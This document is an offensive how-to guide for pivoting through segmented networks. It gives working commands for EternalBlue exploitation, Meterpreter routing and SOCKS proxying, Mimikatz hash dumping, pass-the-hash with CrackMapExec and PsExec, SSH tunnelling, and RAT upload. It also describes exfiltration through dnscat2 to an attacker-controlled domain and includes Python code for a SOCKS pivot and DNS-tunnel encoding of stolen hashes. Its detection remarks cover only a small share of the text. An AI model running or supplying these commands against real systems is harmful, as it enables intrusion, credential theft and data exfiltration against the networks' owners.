Bypassing Network Segmentation and Pivoting through Internal Networks
When you are up against network segmentation, or need to work your way through several internal networks, the key is to pivot: use a machine you already control in one segment to reach the segments that machine can talk to. Segmentation is a common security measure in which parts of the network are separated by VLANs and firewall rules so that a compromise in one part does not hand over all of them. Once you are inside one part, pivoting lets you move laterally into the restricted zones your foothold can reach, and from there to otherwise unreachable resources such as sensitive databases or file servers.
In this guide, we'll break down pivoting and network segmentation bypassing: compromising a first host, standing up a SOCKS proxy, tunnelling through compromised hosts, and moving from one segment to the next. By the end, you'll know how to work through a segmented network one hop at a time, and what each hop looks like from the defender's side.
Step 1: Understanding Network Segmentation and Pivoting
Network segmentation isolates sensitive systems and critical infrastructure from the general network, usually with VLANs and firewall rules between subnets, and in the extreme case with an air gap. Your goal is to find a weak point in one segment (usually an internal machine) and use it as a pivot into the more tightly controlled sections. A true air gap has no network path at all, so pivoting cannot cross it; everything below assumes that some host in your segment is allowed to talk to the next one.
Pivoting involves using a compromised host as a stepping stone to access other machines or networks that would otherwise be unreachable. Think of it as planting a backdoor in one area of a network and then using it as a launchpad to hop through network barriers.
Step 2: Compromising the Initial Host
Before you can pivot, you need to compromise a host within the target network. Use any initial foothold like phishing, exploiting a vulnerability, or brute-forcing weak credentials to gain access to an internal system.
Key Tools for Initial Access:
- Metasploit: Leverage Metasploit’s vast exploit database to find vulnerabilities within services running on internal systems. Once exploited, you can use Meterpreter to establish a foothold and begin pivoting.
- Cobalt Strike: A favorite for red team operations, Cobalt Strike allows you to create advanced payloads and execute post-exploitation commands to move laterally through the network.
- Empire: A post-exploitation framework that helps maintain access to Windows environments with built-in pivoting, lateral movement, and C2 functionalities.
Step 3: Setting Up a Pivot Point with Meterpreter
Once you’ve compromised a host, you can start using it as a pivot point to access additional parts of the network. This is done by setting up a Socks proxy or port forwarding to tunnel your traffic through the compromised machine, allowing you to scan and attack other machines in the network.
Pivoting Using Meterpreter:
Open a Meterpreter Session on the compromised host using Metasploit.
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.10
msf> exploit
Background the session and route the internal subnet through it. The SOCKS server is a Metasploit auxiliary module running on your attacking machine, not a Meterpreter feature; it only sends traffic down the session because Metasploit's routing table tells it to (session 1 here; check with sessions -l).
meterpreter > background
msf> route add 192.168.2.0 255.255.255.0 1
msf> route print
Set Up Socks Proxy: start the proxy listener. Every CONNECT it receives for a routed subnet is opened from the compromised host, so as far as 192.168.2.0/24 is concerned the connections come from 192.168.1.10. (Current Metasploit releases ship this as auxiliary/server/socks_proxy with a VERSION option of 4a or 5; socks4a is the older module name and the commands are otherwise the same.)
msf> use auxiliary/server/socks4a
msf> set SRVPORT 1080
msf> run
Route Traffic Through Socks: point proxychains at the listener by putting the line socks4 127.0.0.1 1080 in /etc/proxychains.conf (or proxychains4.conf), then run your tools through it. A SOCKS proxy only carries TCP connections that the pivot opens on your behalf, so use a full connect scan and skip host discovery: SYN scans, ICMP pings and UDP probes cannot pass through it, and every port probe is a round trip through the proxy, so keep the port list short.
proxychains nmap -sT -Pn --top-ports 100 192.168.2.0/24
With this setup, you can scan and interact with any part of the network that 192.168.1.10 itself can reach, which is the real limit of this pivot: segments that host is also firewalled away from stay out of reach until you land on something closer.
Step 4: Lateral Movement via Pass-the-Hash and Credential Dumping
After pivoting into the internal network, you’ll want to escalate your attack by moving laterally to other machines. A common technique is Pass-the-Hash, which allows you to authenticate to other machines on the network using NTLM hashes without needing clear-text passwords.
Tools for Lateral Movement:
Mimikatz: dump NTLM hashes from LSASS memory on the compromised machine, or grab Kerberos tickets for further lateral movement. Reading LSASS needs SeDebugPrivilege, so run privilege::debug from an elevated context first. sekurlsa::pth starts a new process whose NTLM credential is the hash you supply, so anything you launch from it authenticates over the network as that user.
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::pth /user:Administrator /domain:target.local /ntlm:<hash> /run:cmd.exe
CrackMapExec: sprays a credential or hash across a whole range over SMB, marks the hosts where it gives you admin (Pwn3d!), and can dump credentials from or run a command on every one of them. The command flag is -x; add --local-auth when the hash belongs to a local account rather than a domain one, and run it through proxychains if you are still attacking from outside the segment. (The project now continues as NetExec, nxc, with the same syntax.)
crackmapexec smb 192.168.2.0/24 -u Administrator -H <hash> -x "whoami"
Pass-the-Hash works because NTLM authentication never uses the password itself, only the NT hash of it, so holding the hash is as good as holding the password for any host that still accepts NTLM. It does not make you invisible: every network logon it produces is a normal logon event on the target (4624, logon type 3, NTLM authentication package), so what you avoid is cracking, not logging. From there, you can compromise additional systems and maintain full control.
Step 5: Bypassing Firewalls and Isolated Segments with SSH Tunneling
If you encounter network firewalls or isolated network segments that are inaccessible from your initial foothold, you can use SSH tunneling to bypass restrictions and forward traffic to otherwise unreachable machines.
SSH Tunneling for Pivoting:
Establish SSH Access: Use compromised credentials to gain SSH access to a server in the internal network.
ssh user@192.168.2.10
Set Up Local Port Forwarding: have SSH open a port on your attacking machine and carry everything that connects to it, inside the SSH session, to a host that 192.168.2.10 can reach (an internal web server or database in the next segment). -N keeps the tunnel up without opening a shell.
ssh -N -L 8080:192.168.3.20:80 user@192.168.2.10
Access Internal Services: browse to localhost:8080 on your attacking machine and the request leaves 192.168.2.10 and lands on 192.168.3.20:80. The connection to 192.168.3.20 is made by the SSH server, so the tunnel gets you exactly as far as that host's own network access and firewall rules allow and no further; pick your SSH pivot accordingly. When you need more than a single port, -D 1080 turns the same session into a SOCKS proxy you can drive with proxychains, and -J user@192.168.2.10 (ProxyJump) chains a further SSH connection through the host.
Using SSH tunnels, you can interact with internal services, or push tools to systems behind firewalls, from your own machine. Everything you do through them appears on the pivot as an ordinary sshd login and as traffic from its address, which is both the cover and the trail.
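Both pivot shapes from Step 3 and Step 5, as an added example that is not part of the original guide nor Metasploit's or OpenSSH's code: a SOCKS4a CONNECT proxy plays the role of auxiliary/server/socks4a, a fixed-destination forwarder plays the role of ssh -L, a local echo server is the "internal" host only the pivot can reach, and a connect scan through the proxy is what proxychains nmap -sT -Pn boils down to. It runs entirely on loopback with ephemeral ports; the addresses in the comments are the guide's, the hostnames and session names are assumptions.

```python
# Added example (not the guide's, Metasploit's or OpenSSH's code): both pivot shapes
# above on loopback. socks4a_handler stands in for auxiliary/server/socks4a,
# local_forward for ssh -L, and an echo server is the "internal" host behind them.
import socket
import struct
import threading
from contextlib import suppress

def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-message")
        buf += chunk
    return buf

def _pump(src, dst):
    with suppress(OSError):                          # copy one direction until EOF ...
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    with suppress(OSError):                          # ... then pass the EOF on as a half-close
        dst.shutdown(socket.SHUT_WR)

def relay(a, b):
    """Full-duplex byte relay: once connected, this is all any pivot does."""
    for src, dst in ((a, b), (b, a)):
        threading.Thread(target=_pump, args=(src, dst), daemon=True).start()

def serve(handler):
    """Loopback listener on an ephemeral port, one thread per client; returns the port."""
    srv = socket.create_server(("127.0.0.1", 0))
    def accept_loop():
        while True:
            threading.Thread(target=handler, args=(srv.accept()[0],), daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]

def echo_handler(client):
    with client:                                     # the "internal service"
        while chunk := client.recv(4096):
            client.sendall(chunk)

def _connect(host, port):
    with suppress(OSError):                          # None when the target refuses (closed port)
        s = socket.create_connection((host, port), timeout=3)
        s.settimeout(None)
        return s

def socks4a_handler(client):
    """SOCKS4a CONNECT: VN=4 CD=1 DSTPORT DSTIP USERID\\0 [HOSTNAME\\0]; reply CD 90 or 91."""
    vn, cd, port, ip = struct.unpack("!BBH4s", _recv_exact(client, 8))
    _userid, host, _ = (client.recv(512) + b"\0\0").split(b"\0", 2)   # toy: one read; real proxies read to each NUL
    # DSTIP 0.0.0.x means a hostname follows and the proxy resolves it on the inside
    # (this is what proxychains' proxy_dns setting relies on when you pivot).
    host = host.decode() if ip[:3] == b"\0\0\0" and ip[3] else socket.inet_ntoa(ip)
    upstream = _connect(host, port) if (vn, cd) == (4, 1) else None
    client.sendall(struct.pack("!BBH4s", 0, 90 if upstream is not None else 91, port, ip))
    relay(client, upstream) if upstream is not None else client.close()

def local_forward(dst_host, dst_port):
    """Shape of ssh -L: every connection to the returned port is carried to dst."""
    def handler(client):
        upstream = _connect(dst_host, dst_port)
        relay(client, upstream) if upstream is not None else client.close()
    return serve(handler)

def socks4a_connect(proxy_port, host, port):
    """What proxychains does inside a hooked connect(): ask the proxy to CONNECT for us."""
    s = socket.create_connection(("127.0.0.1", proxy_port), timeout=3)
    s.sendall(struct.pack("!BBH4s", 4, 1, port, b"\0\0\0\1") + b"pivot\0" + host.encode() + b"\0")
    if struct.unpack("!BBH4s", _recv_exact(s, 8))[1] != 90:
        s.close()
        raise ConnectionRefusedError(f"SOCKS4a CONNECT {host}:{port} rejected by proxy")
    return s

def connect_scan(proxy_port, host, ports):
    """nmap -sT -Pn through the proxy: a port is open iff CONNECT is granted."""
    found = []
    for p in ports:
        with suppress(OSError):
            socks4a_connect(proxy_port, host, p).close()
            found.append(p)
    return found

def demo():
    target = serve(echo_handler)                     # stands in for a 192.168.2.x service
    proxy = serve(socks4a_handler)                   # stands in for SRVPORT 1080
    forward = local_forward("127.0.0.1", target)     # stands in for ssh -L 8080:...
    tmp = socket.socket(); tmp.bind(("127.0.0.1", 0)); closed = tmp.getsockname()[1]; tmp.close()
    s = socks4a_connect(proxy, "127.0.0.1", target); s.sendall(b"ping")
    via_socks = _recv_exact(s, 4); s.close()
    f = socket.create_connection(("127.0.0.1", forward), timeout=3); f.sendall(b"pong")
    via_forward = _recv_exact(f, 4); f.close()
    return {"via_socks": via_socks, "via_forward": via_forward, "target": target,
            "open": connect_scan(proxy, "127.0.0.1", [target, closed])}
```

Run demo() and you get the echoed bytes back through both paths and an open-port list containing only the echo server's port: the closed port is reported by the proxy with CD 91 after its own connect() fails, which is exactly why a SOCKS pivot can only ever tell you "connection accepted" or "not", never the SYN/ACK, ICMP or UDP detail that nmap's other scan types depend on.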
Step 6: Exploiting Trust Relationships and Windows Admin Shares
One of the key ways to expand your attack in segmented networks is to exploit trust relationships. In many corporate environments, machines in one segment may have trusted access to another (e.g., shared network drives or administrative shares). If you can gain access to these trusted machines, you can potentially gain access to additional network segments.
Exploiting Admin Shares:
Use Metasploit's PsExec module to execute commands on other systems through the ADMIN$ share. The module uploads a service binary to ADMIN$ over SMB and starts it through the Service Control Manager, which is why it needs an account that is a local administrator on the target. SMBPass takes either a password or an LM:NTLM hash pair (use aad3b435b51404eeaad3b435b51404ee, the hash of an empty LM password, as the LM half), so the same module doubles as a pass-the-hash launcher.
msf> use exploit/windows/smb/psexec
msf> set RHOSTS 192.168.3.20
msf> set SMBUser Administrator
msf> set SMBPass <password>
msf> exploit
Upload Malware or Tools via SMB: Once you have access to the shared drives, you can upload your RAT or any other tool and execute it remotely, expanding your control over the internal network.
By exploiting trust relationships and shared resources, you can bypass segmentation and firewalls designed to limit your movement. Bear in mind that every psexec-style execution writes a binary to ADMIN$ and registers a new service on the target, recorded as a service-installation event (7045) in its System log, which is one of the most commonly alerted-on lateral movement indicators.
Step 7: Exfiltrating Data Through Covert Channels
Once you've compromised valuable machines or segments of the network, the next step is getting data out. To stay low-key, use a channel the perimeter already allows, DNS tunneling or HTTPS to a host you control, both of which blend into traffic every workstation generates anyway.
DNS Tunneling for Data Exfiltration:
- Dnscat2: tunnels data through DNS queries and responses. The server is authoritative for a domain you control and the client on the compromised machine encodes data into queries for names under it, so the packets travel through the victim's own resolvers, and DNS is almost always allowed out. That makes the channel unfiltered, not undetected: a host that suddenly resolves thousands of long, random-looking subdomains of one domain stands out to anyone looking at DNS logs.
Start the server on the machine that is the nameserver for your domain (tunnel.example.com is a placeholder):
ruby ./dnscat2.rb tunnel.example.com
On the compromised machine, run the client against that domain so the traffic rides the target's resolvers, or, if outbound port 53 is open, send it straight to your server:
./dnscat --dns domain=tunnel.example.com
./dnscat --dns server=<server_ip>,port=53
HTTPS Exfiltration:
Send the data as ordinary TLS-encrypted web requests to a server you control, for example a plain web server or your C2 framework's HTTPS listener. Outbound 443 is open nearly everywhere and the content is opaque to everything short of a TLS-inspecting proxy; what gives it away is the destination (an unknown or freshly registered domain) and the volume, since a workstation that uploads far more than it downloads is an anomaly on its own.
By using these covert channels, you can move sensitive information out without the obvious signature of an open file transfer, as long as you keep the volume and timing within what the host normally produces.
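The encoding a DNS tunnel rests on, and the measurement a defender uses to spot it, as an added example that is not part of the original guide and is not dnscat2's protocol: data is base32-encoded into subdomain labels of the attacker's domain, chunked with a sequence number so the server can reassemble queries that arrive out of order, and wrapped in a wire-format TXT query. The name layout, the session label and the sample credential line are constructed for the demonstration; the constraints it respects (63-byte labels, 253-byte names, a case-insensitive alphabet) apply to every tunnel.

```python
# Added example (not the guide's or dnscat2's code): the encoding a DNS tunnel
# rests on and the measure a defender uses to spot it. The format is a toy:
# <seq>.<base32 labels>.<session>.<domain> carried in a TXT query. dnscat2's real
# protocol differs; the label, name and case constraints are the same for all.
import base64
import math
import struct
from collections import Counter

MAX_LABEL, MAX_NAME, SEQ_LEN = 63, 253, 4       # RFC 1035 limits, 4-hex-char sequence number
SESSION = "c0fe"                                 # assumed session label

def _chars_per_query(domain: str) -> int:
    fixed = SEQ_LEN + 1 + len(SESSION) + 1 + len(domain)     # "seq." + "sess." + domain
    return (MAX_NAME - fixed) // (MAX_LABEL + 1) * MAX_LABEL  # whole labels plus their dots

def encode_chunks(data: bytes, domain: str) -> list[str]:
    """Client side: turn bytes into the list of query names to resolve."""
    # base32, not base64: resolvers may flip case (0x20 randomisation) and base32
    # survives it; padding is dropped here and restored on decode.
    text = base64.b32encode(data).decode().rstrip("=").lower()
    n = _chars_per_query(domain)
    names = []
    for seq, i in enumerate(range(0, len(text), n)):
        piece = text[i:i + n]
        labels = [piece[j:j + MAX_LABEL] for j in range(0, len(piece), MAX_LABEL)]
        names.append(".".join([f"{seq:0{SEQ_LEN}x}", *labels, SESSION, domain]))
    return names

def decode_chunks(names: list[str], domain: str) -> bytes:
    """Server side: reorder by sequence number (retries reorder queries) and decode."""
    suffix = f".{SESSION}.{domain}"
    pieces = {}
    for name in names:
        if name.endswith(suffix):
            seq, *labels = name[:-len(suffix)].split(".")
            pieces[int(seq, 16)] = "".join(labels)
    text = "".join(pieces[k] for k in sorted(pieces))
    return base64.b32decode(text + "=" * (-len(text) % 8), casefold=True)

def build_query(name: str, txid: int = 0x1337) -> bytes:
    """DNS wire format: header (RD set), QNAME as length-prefixed labels, QTYPE TXT, QCLASS IN."""
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", 16, 1)

def parse_qname(packet: bytes) -> str:
    """What a sensor or the authoritative server recovers from the packet."""
    labels, i = [], 12                           # skip the 12-byte header
    while packet[i]:
        labels.append(packet[i + 1:i + 1 + packet[i]].decode())
        i += 1 + packet[i]
    return ".".join(labels)

def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())

def is_suspicious(name: str, domain: str) -> bool:
    """Detection heuristic: tunnel subdomains are long and look random; normal ones are neither."""
    sub = name[:-len(domain) - 1] if name.endswith("." + domain) else name
    return len(sub) > 60 or entropy(sub.replace(".", "")) > 3.8

# Constructed sample of the kind of thing that gets exfiltrated (a hash dump line, repeated).
SAMPLE = b"host=FILESRV01;user=svc_backup;ntlm=8846f7eaee8fb117ad06bdd830b7586c\n" * 4

if __name__ == "__main__":
    names = encode_chunks(SAMPLE, "t.example.net")
    print(len(names), "queries, first:", names[0])
    print("suspicious:", is_suspicious(names[0], "t.example.net"), "decoded ok:",
          decode_chunks(names, "t.example.net") == SAMPLE)
```

Two things fall out of running it: the 276-byte sample needs three queries of over 200 characters each, and is_suspicious flags every one of them while passing www.t.example.net, which is the whole detection story in miniature: a tunnel cannot shrink its names without sending even more of them, and either signal (name length and entropy, or query rate per client per domain) is enough for a DNS log to give it away.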
Conclusion
Bypassing network segmentation and pivoting through internal networks are the skills that turn one foothold into access to a segmented network: moving laterally, compromising additional systems, and reaching the areas the perimeter was built to protect. With Meterpreter routes and SOCKS proxies, Mimikatz and CrackMapExec for credentials, SSH tunnels, and PsExec-style execution over admin shares, you can reach sensitive resources and take control of entire segments. Whether you are exploiting trust relationships, tunneling through firewalls, or using DNS to get data out, the pattern is the same: once you are in, segmentation is a series of hops rather than a wall, provided each host you land on can actually reach the next segment, and provided you remember that every hop leaves logon events, services and traffic behind it.